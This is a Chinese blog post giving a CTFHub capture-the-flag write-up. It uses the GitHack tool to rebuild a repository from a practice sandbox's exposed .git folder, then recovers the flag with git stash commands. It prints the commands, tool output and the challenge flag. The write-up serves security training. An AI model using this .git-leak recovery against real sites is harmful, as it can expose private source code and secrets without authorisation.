Git泄露 之Stash(做题过程)

最新推荐文章于 2023-10-24 23:59:09 发布
最新推荐文章于 2023-10-24 23:59:09 发布
阅读量263 收藏
点赞数
分类专栏: CTF靶场 文章标签: git 服务器 github
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_admin/article/details/127603628
版权

当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。请尝试使用BugScanTeam的GitHack完成本题。

第一步

──(root㉿kali)-[~/Downloads/GitHack-master]
└─# python2 GitHack.py http://challenge-3d7b5c38c41a690e.sandbox.ctfhub.com:10800/.git

  ____ _ _   _   _            _
 / ___(_) |_| | | | __ _  ___| | __
| |  _| | __| |_| |/ _` |/ __| |/ /
| |_| | | |_|  _  | (_| | (__|   <
 \____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}
 A '.git' folder disclosure exploit.

[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://challenge-3d7b5c38c41a690e.sandbox.ctfhub.com:10800/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
正克隆到 '/root/Downloads/GitHack-master/dist/challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800'...
fatal: 仓库 'http://challenge-3d7b5c38c41a690e.sandbox.ctfhub.com:10800/.git/' 未找到
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://challenge-3d7b5c38c41a690e.sandbox.ctfhub.com:10800/.git/ is not support Directory Listing
[-] [Skip][First Try] Target is not support Directory Listing
[*] Try to clone with Cache
[*] Initialize Git
[!] Initialize Git Error: 提示:使用 'master' 作为初始分支的名称。这个默认分支名称可能会更改。要在新仓库中
提示:配置使用初始分支名,并消除这条警告,请执行:                                                                  
提示:                                                                                                              
提示:  git config --global init.defaultBranch <名称>                                                               
提示:                                                                                                              
提示:除了 'master' 之外,通常选定的名字有 'main'、'trunk' 和 'development'。                                       
提示:可以通过以下命令重命名刚创建的分支:                                                                          
提示:                                                                                                              
提示:  git branch -m <name>                                                                                        
                                                                                                                    
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] ORIG_HEAD
[*] FETCH_HEAD
[*] refs/heads/master
[*] refs/remote/master
[*] index
[*] logs/HEAD
[*] logs/refs/heads/master
[*] Fetch Commit Objects
[*] objects/9a/814d0ab6196e45c305fb34dd562a0996a38fa0
[*] objects/01/2ae1fc6b838a345b689ae6bb4ec0edfd517a64
[*] objects/5e/ac998306c334f4d66f6df404ffd09698720000
[*] objects/5e/9410afa84aa32a004016a7bb6b56aa163f0a72
[*] objects/90/71e0a24f654c88aa97a2273ca595e301b7ada5
[*] objects/2c/59e3024e3bc350976778204928a21d9ff42d01
[*] objects/70/6546276aaa3cd7eb8b5906cf35242f664a11de
[*] objects/e3/58b09f4cb4e5800dd20e1aa6758bf80811001a
[*] Fetch Commit Objects End
[*] logs/refs/remote/master
[*] logs/refs/stash
[*] refs/stash
[*] Fetch Commit Objects
[*] objects/4f/d799714fef05c2fd5b7ff82546de7f2fd16957
[*] objects/87/4a65c013d4aceb1bab782f8290851097801c69
[*] objects/f7/65c3c922115e7b3d1974e422f2bad433794e52
[*] objects/55/00acf915f3e21f4dfde7b997e78c48f9319925
[*] Fetch Commit Objects End
[*] Valid Repository
[+] Valid Repository Success

[+] Clone Success. Dist File : /root/Downloads/GitHack-master/dist/challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800                                                                                                                  

第二步

                                                                                                                   
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─# cd dist                                                    
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist]
└─# ll
总用量 4
drwxr-xr-x 3 root root 4096 10月 30 07:28 challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist]
└─# cd challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800]
└─# ll
总用量 8
-rw-r--r-- 1 root root 494 10月 30 07:28 50x.html
-rw-r--r-- 1 root root 143 10月 30 07:28 index.html
                                                                                                                    

第三步

                                                                                                                 
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800]
└─# git stash list
stash@{0}: WIP on master: 5eac998 add flag
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800]
└─# git stash pop
冲突(修改/删除):225112542515187.txt 在 Updated upstream 中被删除,在 Stashed changes 中被 修改。225112542515187.txt 的 Stashed changes 版本被保留。
位于分支 master
未合并的路径:
  (使用 "git restore --staged <文件>..." 以取消暂存)
  (酌情使用 "git add/rm <文件>..." 标记解决方案)
        由我们删除: 225112542515187.txt

修改尚未加入提交(使用 "git add" 和/或 "git commit -a")
贮藏条目被保留以备您再次需要。
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800]
└─# cat 225112542515187.txt
ctfhub{3e561fa5af922973104bc108}
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800]
└─#

Mr_admin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
git 合并解决冲突
qq_24276415的博客
02-23 1370
解决冲突 git status 位于分支 feature-master-bev-3d 您的分支与上游分支 'origin/feature-master-bev-3d' 一致。 未跟踪的文件: (使用 "git add <文件>..." 以包含要提交的内容) packlist_20220118191312.txt 提交为空,但是存在尚未跟踪的文件(使用 "git add" 建立跟踪) [yunyi.geng@gpu-dev041 hde-manager]$ git branch f
this file is read-only.you must save to a different filename
学如逆水行舟,不进则退!
04-26 2323
今天在用别人的wenjian
gcc编译部分编译选项
热门推荐
JabamiYu的博客
01-29 3万+
我只写出一些我没有在文档中查到的,网上也搜索不出来什么明确的资料。正确性实在不敢保证。 https://gcc.gnu.org/onlinedocs/gcc-7.3.0/gcc/Option-Summary.html#Option-Summary 这是文档。 使用gcc命令显示的帮助信息 用法:gcc [选项] 文件... 选项: -pass-exit-codes
Creating a Visual Basic Add-In (转贴、VBIDE编程的经典之作)
cheneychao的专栏
03-20 5976
转贴:下面是原文地址http://podgoretsky.com/ftp/Docs/Basic/Using%20Visual%20Basic%205/ch43.htm Creating a Visual Basic Add-In Introducing add-ins VB5s Integrated Development Environment (IDE) is
CTFHub | web——Git泄露Stash、Index
最新发布
2301_76435948的博客
10-24 511
当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。这一次学聪明了,不懂会先去查本题的题目类型了,哈哈哈!先去查一波stash,因为此题很可能需要用到git操作的stash工具。对于这题,和上面一题常规流程,打开GitHack,扫描该网址,就出现一个txt文件,打开就是flag。
常用git stash命令
Koromon的博客
10-10 405
常用git stash命令: (1)git stash save “save message” : 执行存储时,添加备注,方便查找,只有git stash 也要可以的,但查找时不方便识别。 (2)git stash list :查看stash了哪些存储 (3)git stash show :显示做了哪些改动,默认show第一个存储,如果要显示其他存贮,后面加stash@{$num},比如第二个 git stash show stash@{1} (4)git stash show -p : 显示第一个存储的
Git泄露_Log
Mr_admin的博客
09-23 1957
刚开始的时候不知道git命令,直接百度。做后确定命令格式为:python2 GitHack.py http://challenge-4e45df1c40b42551.sandbox.ctfhub.com:10800/.git/当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。我用的是新版kali环境做的题目(kali日期为2022-3,这个版本安装了python2和python3。后面使用命令要注意,我在这里踩坑了。先是捣鼓git软件怎么使用。
git泄露漏洞
TItaniumLJA的博客
11-23 5714
git简介 git是一个开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。当前大量开发人员使用git进行版本控制,对站点自动部署。攻击者可以利用该漏洞下载git文件夹里的所有内容。如果文件夹内有敏感信息比如站点源码、数据库账户密码等,攻击者可能直接控制服务器。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。 .git目录 config - 包含一些配置选项 description - 仓库的描述信息,主要给gitweb等git托管系统使用 HEAD - 指定
CTFHUB Web题解记录(信息泄露、弱口令部分)
豆傻小饼干随记
03-18 6732
以下内容只是自己做题的一个记录,不喜勿喷 一、信息泄露 1、目录遍历 这里通过观察目录的情况,发现目录都是 /flag_in_here/1/%d 的样式,于是构造脚本 #!/usr/bin/python3 # -*- coding: utf-8 -*- # --author:valecalida-- import urllib.request import urllib.re...
【脚本程序】GitHack利用脚本
weixin_30443895的博客
10-20 253
GitHack GitHack is a.gitfolder disclosure exploit. It rebuild source code from .git folder while keep directory structure unchanged. GitHack是一个.git泄露利用脚本,通过泄露的.git文件夹下的文件,重建还原工程源代码。 渗透测试人员、...
vscode-gitstash:为VS Code添加了额外的Git隐藏功能
05-17
向VS Code添加额外的git stash功能。 特征 可配置的资源管理器树 几乎所有带有最常用选项的隐藏命令 将操作应用于树视图中的隐藏数据 应用,弹出,放下藏匿处 比较隐藏的文件更改或与当前文件状态进行比较 应用单个...
svn-stash:就像git stash,但是对于Subversion
02-03
就像git stash命令一样,但是对于Subversion。 如果您不懂git,则应该阅读 Svn-stash允许您隐藏不想立即提交的更改。 在某些情况下,这可能会更有用。 为什么? 我喜欢git,我认为它应该用在任何程序员开始的新...
git stash参数介绍
01-20
git stash 用于暂存工作区未提交的内容,便于在同时开发多个分支需要切换时保存当前分支进度。 list 语法 git stash list [] ,与git log功能类似,列出储藏列表,options 参数可以参考git log的参数 show 语法 git ...
git stash暂存的操作方法
10-15
主要介绍了git stash暂存的操作方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
Git】之Git使用案例
01-27
本文来自csdn,本文主要介绍一下Git在实际项目开发中的使用流程,包括克隆、暂存、提交、推送、拉取、分支、冲突解决等,暂时还不包括回退。1、首先需要安装Git,下一步下一步就行,这里就不说了。值得一提的是,...
ctfhub中git泄露-stash
weixin_50683638的博客
11-23 1270
WP ——stash 题目如下 跟上一题一样用dirsearch扫描看到有git目录后用GitHack 进入目录 首先还是git log,但是回退版本或者使用git diff的话返回的内容没有flag,因此直接git stash list,发现有add flag 因此直接git stash apply或者git stash pop,然后发现目录下多了个txt文件,打开里面就是flag. ...
CTFHub-Web-信息泄露-Git泄露
qq_54037445的博客
11-18 3160
CTFHub-Web-信息泄露-Git泄露 Log、Stash、Index
mfw 攻防世界web题 (Git泄露
一醉一休的博客
02-23 1151
当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。 危害 攻击者可以利用该漏洞下载git文件夹里的所有内容。如果文件夹内有敏感信息比如站点源码、数据库账户密码等,攻击者可能直接控制服务器。 一、mfw 1)点开,没发现什么有用的 2)继续 3)发现有Git,可能是Git泄露,直接/.git 4)一个个点看看,在index中,ps打开 <?php if (isset($_GET...
Git泄露(.git leakage)(git log 和 Stash储藏)+ [CTFHub]Git泄露系列writeup
ShenZ的博客
09-07 1824
Git泄露 .git leakage 当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。 .git文件夹中 hooks:存放一些shell脚本 info:存放仓库的全局性排除文件信息 logs:保存所有更新的引用记录 objects:存放所有的git对象 refs:存储指向分支的提交对象的指针 config:仓库的配置信息 index:暂存区(二进制) HEAD:映射到ref的引用 工具 githack pytho
git stash git stash pop
08-15
回答: 在Git中,"git stash"命令用于将当前的工作区修改保存到暂存区。这样可以让你暂时切换到其他任务或分支上,而不必提交未完成的工作。而"git stash pop"命令会将最近一次保存在暂存区的修改应用到当前工作区,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值